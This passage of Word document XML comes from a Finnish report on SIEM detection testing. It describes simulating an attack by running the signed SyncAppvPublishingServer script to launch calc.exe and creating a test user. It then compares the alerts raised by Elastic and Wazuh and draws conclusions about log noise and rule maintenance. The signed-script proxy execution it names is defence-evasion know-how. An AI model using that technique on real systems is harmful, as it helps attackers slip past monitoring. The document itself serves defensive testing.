        <w:rPr/>
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidR="3C494772">
        <w:rPr/>
        <w:t xml:space="preserve">in suorittaminen ja .exe ohjelman käynnistys voisi jäädä SIEM-työkaluun kiinni. </w:t>
      </w:r>
      <w:r w:rsidR="7CC95CCA">
        <w:rPr/>
        <w:t xml:space="preserve">Epätavallinen toiminta, kuten juuri näiden prosessien käynnistäminen voi aiheuttaa hälytyksiä, koska ne eivät ole normaaleita tapoja toimia päätelaitteilla. </w:t>
      </w:r>
      <w:r w:rsidR="09AA50D2">
        <w:rPr/>
        <w:t xml:space="preserve">Allekirjoitettu skripti voi myös </w:t>
      </w:r>
      <w:r w:rsidR="27079A14">
        <w:rPr/>
        <w:t xml:space="preserve">tehdä asioita järjestelmässä, jotka aiheuttavat hälytyksiä, vaikka itse skripti olisi allekirjoitettu ja SIEM ei tunnistaisi sitä </w:t>
      </w:r>
      <w:r w:rsidR="6CC495E5">
        <w:rPr/>
        <w:t>uhaksi.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="006A045F" w:rsidR="00A52CFC" w:rsidP="006A045F" w:rsidRDefault="0086585F" w14:paraId="05784BE0" w14:textId="3F4AB92B">
      <w:r>
        <w:t>Hyökkäyksen simuloimiseen käytettiin komentoa</w:t>
      </w:r>
      <w:r w:rsidR="00E31672">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00030B76">
        <w:t xml:space="preserve">joka </w:t>
      </w:r>
      <w:r w:rsidR="00B47C7B">
        <w:t>suorittaa</w:t>
      </w:r>
      <w:r w:rsidR="00164CC4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006A262D">
        <w:t>allekirjoitet</w:t>
      </w:r>
      <w:r w:rsidR="00B47C7B">
        <w:t>un</w:t>
      </w:r>
      <w:r w:rsidR="006A262D">
        <w:t xml:space="preserve"> SyncAppvPublishing</w:t>
      </w:r>
      <w:r w:rsidR="00E816B5">
        <w:t>Server</w:t>
      </w:r>
      <w:r w:rsidR="00B47C7B">
        <w:t>-skriptin</w:t>
      </w:r>
      <w:r w:rsidR="004C3178">
        <w:t xml:space="preserve"> ja </w:t>
      </w:r>
      <w:r w:rsidR="001F46D2">
        <w:t xml:space="preserve">käynnistää </w:t>
      </w:r>
      <w:r w:rsidR="00A72BEF">
        <w:t>calc.exe -ohjelman eli Windowsin laskimen.</w:t>
      </w:r>
      <w:r w:rsidR="007C13FE">
        <w:t xml:space="preserve"> (Kuvio</w:t>
      </w:r>
      <w:r w:rsidR="00C624ED">
        <w:t xml:space="preserve"> 34</w:t>
      </w:r>
      <w:r w:rsidR="007C13FE">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00C624ED">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C624ED" w:rsidP="00C624ED" w:rsidRDefault="007C13FE" w14:paraId="4D06623D" w14:textId="77777777">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="007C13FE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="12072B43" wp14:editId="0CCD06BA">
            <wp:extent cx="6120130" cy="175260"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="199716826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8263" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId50"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6120130" cy="175260"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="006A045F" w:rsidR="00E51864" w:rsidP="00C624ED" w:rsidRDefault="00C624ED" w14:paraId="6BDDEF74" w14:textId="0028504A">
      <w:pPr>
        <w:pStyle w:val="Kuvaotsikko"/>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc183971551" w:id="78"/>
      <w:r>
        <w:t xml:space="preserve">Kuvio </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Kuvio \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00390358">
        <w:t>34</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>. Komento</w:t>
      </w:r>
      <w:bookmarkEnd w:id="78"/>
    </w:p>
    <w:p w:rsidRPr="006A045F" w:rsidR="007C13FE" w:rsidP="006A045F" w:rsidRDefault="00623D0B" w14:paraId="1897DD90" w14:textId="10EEA52F">
      <w:r>
        <w:t xml:space="preserve">Hyökkäys näkyi Elasticissa </w:t>
      </w:r>
      <w:r w:rsidR="00A10C5F">
        <w:t xml:space="preserve">hälytyksenä, jonka aiheena oli Windows </w:t>
      </w:r>
      <w:r w:rsidR="00364D12">
        <w:t xml:space="preserve">skripti, joka käyttää PowerShelliä. </w:t>
      </w:r>
      <w:r w:rsidR="00DC1785">
        <w:t>Hyökkäyksen analyysi</w:t>
      </w:r>
      <w:r w:rsidR="006F1710">
        <w:t xml:space="preserve"> kertoi, mitä komentoa on käytetty ja mitä sillä on avattu. (Kuvio </w:t>
      </w:r>
      <w:r w:rsidR="00C624ED">
        <w:t>35</w:t>
      </w:r>
      <w:r w:rsidR="006F1710">
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C624ED" w:rsidP="00C624ED" w:rsidRDefault="009A03BC" w14:paraId="74753291" w14:textId="77777777">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="009A03BC">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6EB9C9B2" wp14:editId="63A17FE3">
            <wp:extent cx="6120130" cy="2534920"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1716693763" name="Kuva 1" descr="Kuva, joka sisältää kohteen teksti, kuvakaappaus, Fontti,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3763" name="Kuva 1" descr="Kuva, joka sisältää kohteen teksti, kuvakaappaus, Fontti, diagrammi&#10;&#10;Kuvaus luotu automaattisesti"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId51"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6120130" cy="2534920"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="006A045F" w:rsidR="006F1710" w:rsidP="00C624ED" w:rsidRDefault="00C624ED" w14:paraId="1A4ABF3A" w14:textId="6D9381DB">
      <w:pPr>
        <w:pStyle w:val="Kuvaotsikko"/>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc183971552" w:id="79"/>
      <w:r>
        <w:t xml:space="preserve">Kuvio </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Kuvio \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00390358">
        <w:t>35</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Analyysi </w:t>
      </w:r>
      <w:r w:rsidR="00A944DC">
        <w:t>skriptin</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> suorittamisesta</w:t>
      </w:r>
      <w:bookmarkEnd w:id="79"/>
    </w:p>
    <w:p w:rsidR="000C6DF7" w:rsidP="000C6DF7" w:rsidRDefault="000C6DF7" w14:paraId="1645FDAA" w14:textId="335B0E5A">
      <w:pPr>
        <w:pStyle w:val="Otsikko1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc1460404387" w:id="2026165247"/>
      <w:r w:rsidR="000C6DF7">
        <w:rPr/>
        <w:t>Yhteenveto</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2026165247"/>
    </w:p>
    <w:p w:rsidR="000C6DF7" w:rsidP="008E48DF" w:rsidRDefault="008E48DF" w14:paraId="589E48B6" w14:textId="5131D533">
      <w:pPr>
        <w:pStyle w:val="Otsikko2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc1740597137" w:id="1810322409"/>
      <w:r w:rsidR="008E48DF">
        <w:rPr/>
        <w:t>Tulosten analysointi ja johtopäätköset</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1810322409"/>
    </w:p>
    <w:p w:rsidR="008E48DF" w:rsidP="008E48DF" w:rsidRDefault="008E48DF" w14:paraId="749BA88C" w14:textId="7885DDCE">
      <w:r>
        <w:t>Kun analysoidaan</w:t>
      </w:r>
      <w:r w:rsidRPr="000D350B" w:rsidR="000D350B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000D350B">
        <w:t>testien seurauksina</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000D350B">
        <w:t xml:space="preserve">järjestelmiin syntyneitä hälytyksiä, </w:t>
      </w:r>
      <w:r w:rsidR="00FD7BAF">
        <w:t>saamme hyvän kuvan kerätystä tiedosta, hälytysten kattavuudesta</w:t>
      </w:r>
      <w:r w:rsidR="00A840CE">
        <w:t xml:space="preserve"> ja</w:t>
      </w:r>
      <w:r w:rsidR="00FD7BAF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A840CE">
        <w:t xml:space="preserve">mahdollisista puutteista. Ensimmäisenä on hyvä ymmärtää, että järjestelmät toimivat juuri niin hyvin, kuin niihin on panostettu. Meidän tapauksemme käytämme </w:t>
      </w:r>
      <w:r w:rsidR="00C714AF">
        <w:t>enimmäkseen</w:t>
      </w:r>
      <w:r w:rsidR="00A840CE">
        <w:t xml:space="preserve"> valmiita </w:t>
      </w:r>
      <w:r w:rsidR="00C714AF">
        <w:t xml:space="preserve">hälytys sääntöjä ja muutamaa integraatiota. Sääntöjä tulee luoda ja päivittää itse, </w:t>
      </w:r>
      <w:r w:rsidR="000B2FBF">
        <w:t>jotta ne pysyvät ajankohtaisena.</w:t>
      </w:r>
      <w:r w:rsidR="009E608C">
        <w:t xml:space="preserve"> Tiedon oikeaoppinen suodattaminen ja kokoonpaneminen on myös avain asemassa, kun käsitellään suuria data määriä.</w:t>
      </w:r>
      <w:r w:rsidR="00B238C4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA618C" w:rsidP="008E48DF" w:rsidRDefault="000B2FBF" w14:paraId="0461D938" w14:textId="5BBE13D7">
      <w:r>
        <w:t>On myös tärkeää huomioida</w:t>
      </w:r>
      <w:r w:rsidR="00076D38">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00033211">
        <w:t xml:space="preserve"> että järjestelmät toimivat yhdessä täydentäen toinen toistaan.</w:t>
      </w:r>
      <w:r w:rsidR="009B69D9">
        <w:t xml:space="preserve"> Tämä korostui testauksien aikana</w:t>
      </w:r>
      <w:r w:rsidR="003F5819">
        <w:t xml:space="preserve">, kun tutkimme Security Onion lokeja </w:t>
      </w:r>
      <w:r w:rsidR="00220B60">
        <w:t xml:space="preserve">Wazuh lokien kanssa. Järjestelmät keräävät tietoa eri kohteista, Security onion keskittyy verkkoliikenteeseen, kun taas Wazuh keskittyy enemmän </w:t>
      </w:r>
      <w:r w:rsidR="007D3EDC">
        <w:t>päätelaittei</w:t>
      </w:r>
      <w:r w:rsidR="00402DEB">
        <w:t xml:space="preserve">ssa tapahtuviin asioihin, kuten </w:t>
      </w:r>
      <w:r w:rsidR="00B238C4">
        <w:t>kirjautumisiin</w:t>
      </w:r>
      <w:r w:rsidR="00402DEB">
        <w:t xml:space="preserve"> ja </w:t>
      </w:r>
      <w:r w:rsidR="00B238C4">
        <w:t>suoritettuihin komentoihin.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC2425" w:rsidP="008E48DF" w:rsidRDefault="00EC2425" w14:paraId="69542DFA" w14:textId="2DDA9E2E">
      <w:r w:rsidRPr="00EC2425">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Yksi keskeinen huomio testeissä oli lokimelun, eli turhien hälytysten, suuri määrä. Tällaiset hälytykset tekevät oikeiden uhkien tunnistamisesta haastavaa. Esimerkiksi Wazuh tuotti paljon hälytyksiä, kun </w:t>
      </w:r>
      <w:r w:rsidR="001D0557">
        <w:t>paloalto</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC2425">
        <w:t>-käyttäjä kirjautui DC01-palvelimelle noutaakseen AD-käyttäjätietoja. Tämäntyyppiset hälytykset ovat usein tarpeettomia, mutta niitä voidaan hallita tarkentamalla sääntöjä ja suodattamalla tietyt tapahtumatyypit pois.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED2847" w:rsidP="00ED2847" w:rsidRDefault="00ED2847" w14:paraId="461C66D3" w14:textId="13F77AA5">
      <w:pPr>
        <w:pStyle w:val="Otsikko3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc2045206763" w:id="1441926032"/>
      <w:r w:rsidR="00ED2847">
        <w:rPr/>
        <w:t>Johtopäätökset</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1441926032"/>
    </w:p>
    <w:p w:rsidRPr="003A0A6E" w:rsidR="00ED2847" w:rsidP="00ED2847" w:rsidRDefault="008B3540" w14:paraId="7074C452" w14:textId="47E69672">
      <w:pPr>
        <w:pStyle w:val="Luettelokappale"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Monikerroksinen lähestymistapa: </w:t>
      </w:r>
      <w:r>
        <w:t>Järjestelmät keskittyvät eri lähteisiin. Security Onion keski</w:t>
      </w:r>
      <w:r w:rsidR="003A0A6E">
        <w:t>t</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">tyy </w:t>
      </w:r>
      <w:r w:rsidR="003A0A6E">
        <w:t xml:space="preserve">verkkoliikenteeseen, kun taas </w:t>
      </w:r>
      <w:r w:rsidR="00580A8F">
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidR="003A0A6E">
        <w:t>azuh ja Elastic tarkkailevat enemmän päätelaitteita ja käyttäjätoimintaa.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="003A0A6E" w:rsidR="003A0A6E" w:rsidP="00ED2847" w:rsidRDefault="003A0A6E" w14:paraId="0660BFD3" w14:textId="607ADCEC">
      <w:pPr>
        <w:pStyle w:val="Luettelokappale"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Sääntöjen päivitys: </w:t>
      </w:r>
      <w:r>
        <w:t>Järjestelmien säännöt vaativat jatkuvaa päivittämistä uusien uhkien havaitsemiseksi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00ED2847" w:rsidR="003A0A6E" w:rsidP="00ED2847" w:rsidRDefault="004761AC" w14:paraId="3D2C4AA5" w14:textId="500A6A3F">
      <w:pPr>
        <w:pStyle w:val="Luettelokappale"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="261F289F" w:rsidR="004761AC">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>Tiedon suodattaminen:</w:t>
      </w:r>
      <w:r w:rsidR="004761AC">
        <w:rPr/>
        <w:t xml:space="preserve"> Tietoa tulee osata suodattaa, jotta voimme keskittyä olennaisiin hälytyksiin paremmin.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="261F289F" w:rsidP="261F289F" w:rsidRDefault="261F289F" w14:paraId="4056B90C" w14:textId="79B7726F">
      <w:pPr>
        <w:pStyle w:val="Normaali"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00175E8D" w:rsidP="00D92BBA" w:rsidRDefault="00D92BBA" w14:paraId="169CF619" w14:textId="64790E73">
      <w:pPr>
        <w:pStyle w:val="Otsikko2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc1503650283" w:id="1027206243"/>
      <w:r w:rsidR="00D92BBA">
        <w:rPr/>
        <w:t>Työkalujen tehokkuus ja ominaisuudet</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1027206243"/>
    </w:p>
    <w:p w:rsidR="00D92BBA" w:rsidP="00D92BBA" w:rsidRDefault="00D92BBA" w14:paraId="209ABDAF" w14:textId="4F2AA8CC">
      <w:r>
        <w:t xml:space="preserve">Niin kuin aiemmin mainittu, työkalut keskittyvät keräämään tietoa eri osa-alueilta ja niitä on tarkoitus käyttää </w:t>
      </w:r>
      <w:r w:rsidR="00E85A80">
        <w:t xml:space="preserve">yhdessä, selkeän kokonaiskuvan muodostamiseksi. Järjestelmistä löytyy </w:t>
      </w:r>
      <w:r w:rsidR="002E4178">
        <w:t xml:space="preserve">eri ominaisuuksia, joten tietty järjestelmä soveltuu toiseen tehtävään paremmin kuin toinen. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E4178" w:rsidP="00D92BBA" w:rsidRDefault="007C0E6C" w14:paraId="4A1F9761" w14:textId="7B1261AE">
      <w:r>
        <w:t xml:space="preserve">Otetaan vertailuun aluksi </w:t>
      </w:r>
      <w:r w:rsidR="00312B7D">
        <w:t>testitapaus,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> jossa loimme käyttäjän $ ATOMIC123!</w:t>
      </w:r>
      <w:r w:rsidR="00312B7D">
        <w:t xml:space="preserve"> Verr</w:t>
      </w:r>
      <w:r w:rsidR="008E53C3">
        <w:t>ataan hälytyksiä ElasticSIEM ja Wazuh järjestelmien välillä.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E53C3" w:rsidP="00D92BBA" w:rsidRDefault="008E53C3" w14:paraId="55FB28E4" w14:textId="01AB5467">
      <w:r>
        <w:t>Elastic</w:t>
      </w:r>
      <w:r w:rsidR="00763EB3">
        <w:t xml:space="preserve"> ilmoittaa selkeästi lisätiedoissa prosessin argumentit, nimen,</w:t>
      </w:r>
      <w:r w:rsidR="00035851">
        <w:t xml:space="preserve"> ja vastaa kysymyksiin kuka, missä ja milloin. Argumenteista selviää myös luodun käyttäjän nimi.</w:t>
      </w:r>
      <w:r w:rsidR="00541C8D">
        <w:t xml:space="preserve"> (Kuvio 36).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00295222" w:rsidP="00295222" w:rsidRDefault="00295222" w14:paraId="538F6B33" w14:textId="77777777">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="00295222">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="73F3414E" wp14:editId="3D927EAB">
            <wp:extent cx="5419240" cy="2948026"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="1857356560"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56560" name="Kuva 1" descr="Kuva, joka sisältää kohteen teksti, kuvakaappaus, numero, Fontti&#10;&#10;Kuvaus luotu automaattisesti"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId52"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5420573" cy="2948751"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00035851" w:rsidP="00295222" w:rsidRDefault="00295222" w14:paraId="3517FA65" w14:textId="6D86720C">
      <w:pPr>
        <w:pStyle w:val="Kuvaotsikko"/>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc183971553" w:id="84"/>
      <w:r>
        <w:t xml:space="preserve">Kuvio </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Kuvio \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00390358">
        <w:t>36</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:bookmarkEnd w:id="84"/>
      <w:r w:rsidR="00580A8F">
        <w:t>Elasticin hälytys käyttäjän luonnista</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00295222" w:rsidP="00295222" w:rsidRDefault="00820AD8" w14:paraId="301C8ED0" w14:textId="63FBCC3D">
      <w:r>
        <w:t>Wazuh ilmoittaa hälytyks</w:t>
      </w:r>
      <w:r w:rsidR="00FE5C16">
        <w:t xml:space="preserve">issään kätevästi, mihin hyökkäys taktiikkaan tapahtuma vastaa MITRE:ssä. Loki tiedoissa </w:t>
      </w:r>
      <w:r w:rsidR="00580A8F">
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidR="00FE5C16">
        <w:t xml:space="preserve">azuh ei tosin tunnista luodun käyttäjä </w:t>
      </w:r>
      <w:r w:rsidR="00A54FA7">
        <w:t>nimeä $</w:t>
      </w:r>
      <w:r w:rsidR="00FE5C16">
        <w:t xml:space="preserve"> merkin jälkeen vaan kirjaa luodun käyttäjän nimeksi $. </w:t>
      </w:r>
      <w:r w:rsidR="00BE513D">
        <w:t>(Kuvio 37)</w:t>
      </w:r>
      <w:r w:rsidR="00541C8D">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BE513D" w:rsidP="00BE513D" w:rsidRDefault="00BE513D" w14:paraId="315A1971" w14:textId="77777777">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="00BE513D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="68AA475D" wp14:editId="469B007F">
            <wp:extent cx="4352544" cy="2568263"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="17566606" name="Kuva 1" descr="Kuva, joka sisältää kohteen teksti, kuvakaappaus, ruokali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606" name="Kuva 1" descr="Kuva, joka sisältää kohteen teksti, kuvakaappaus, ruokalista&#10;&#10;Kuvaus luotu automaattisesti"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId53"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4355727" cy="2570141"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="007B7B81" w:rsidR="00035851" w:rsidP="00541C8D" w:rsidRDefault="00BE513D" w14:paraId="703893A7" w14:textId="1029D579">
      <w:pPr>
        <w:pStyle w:val="Kuvaotsikko"/>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc183971554" w:id="85"/>
      <w:r w:rsidRPr="007B7B81">
        <w:t xml:space="preserve">Kuvio </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="007B7B81">
        <w:instrText xml:space="preserve"> SEQ Kuvio \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="007B7B81" w:rsidR="00390358">
        <w:t>37</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="007B7B81">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:bookmarkEnd w:id="85"/>
      <w:r w:rsidR="00541C8D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Wazuh:n hälytys käyttäjän luonnista</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00551BBB" w:rsidP="00D92BBA" w:rsidRDefault="00EA7BA6" w14:paraId="0C28653C" w14:textId="1716D23C">
      <w:r w:rsidRPr="00F95129">
        <w:t xml:space="preserve">Elasticistä löytyy myös </w:t>
      </w:r>
      <w:r w:rsidR="00D9597C">
        <w:t>monia</w:t>
      </w:r>
      <w:r w:rsidR="00F95129">
        <w:t xml:space="preserve"> erilaisia tapausten analysointityökaluja</w:t>
      </w:r>
      <w:r w:rsidR="00D546D4">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00F95129">
        <w:t xml:space="preserve"> kuten </w:t>
      </w:r>
      <w:r w:rsidR="00551BBB">
        <w:t>analyzer, jonka saa suoraan auki hälytyksestä</w:t>
      </w:r>
      <w:r w:rsidR="00541C8D">
        <w:t>, kuten</w:t>
      </w:r>
      <w:r w:rsidR="00F35337">
        <w:t xml:space="preserve"> kuviossa 38</w:t>
      </w:r>
      <w:r w:rsidR="00551BBB">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00F35337">
        <w:t xml:space="preserve">Järjestelmässä pystyy myös luomaan hälytyksistä aikajanoja ja </w:t>
      </w:r>
      <w:r w:rsidR="00541C8D">
        <w:t>c</w:t>
      </w:r>
      <w:r w:rsidR="00C93EAC">
        <w:t>aseja.</w:t>
      </w:r>
      <w:r w:rsidR="00D9597C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00761A5C" w:rsidP="00761A5C" w:rsidRDefault="00761A5C" w14:paraId="018BE8AB" w14:textId="77777777">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="00761A5C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="04A98229" wp14:editId="754B2C64">
            <wp:extent cx="5457139" cy="2718944"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="860353464" name="Kuva 1" descr="Kuva, joka sisältää kohteen teksti, diagrammi, ohjelmisto,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53464" name="Kuva 1" descr="Kuva, joka sisältää kohteen teksti, diagrammi, ohjelmisto, kuvakaappaus&#10;&#10;Kuvaus luotu automaattisesti"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId54"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5460530" cy="2720633"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00551BBB" w:rsidP="00761A5C" w:rsidRDefault="00761A5C" w14:paraId="5EE6CF55" w14:textId="37A2236A">
      <w:pPr>
        <w:pStyle w:val="Kuvaotsikko"/>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc183971555" w:id="86"/>
      <w:r>
        <w:t xml:space="preserve">Kuvio </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Kuvio \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00390358">
        <w:t>38</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
